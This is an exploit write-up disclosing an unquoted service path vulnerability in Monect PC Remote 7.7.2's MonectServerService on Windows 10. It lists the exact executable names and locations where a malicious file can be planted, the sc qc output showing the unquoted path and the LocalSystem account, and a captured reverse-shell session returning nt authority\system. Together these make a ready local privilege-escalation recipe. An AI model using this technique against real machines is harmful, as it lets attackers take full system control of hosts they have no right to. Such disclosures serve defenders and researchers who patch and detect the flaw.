# Exploit Title: Monect PC Remote 7.7.2 - Unquoted path service
# Date: 25/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.monect.com/
# Software Link:
https://github.com/monect/pcremote-release/releases/download/v7.7.2/PCRemoteReceiverSetup_7_7_2.exe
# Version: 7.7.2
# Tested on: Windows 10

'''
Monect PC Remote 7.7.2 has an unquoted service path vulnerability in
MonectServerService. This allows local attackers with write access to
execute code as LocalSystem by placing a malicious executable in the
service path and restarting the service.

examples files names and locations:
PC.exe in C:\

PC.exe in C:\Program Files\

PC Remote.exe in C:\Program Files\

Connection received on 192.168.8.105 49671
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>


'''

sc qc MonectServerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MonectServerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\PC Remote
Receiver\MonectServerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MonectServerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem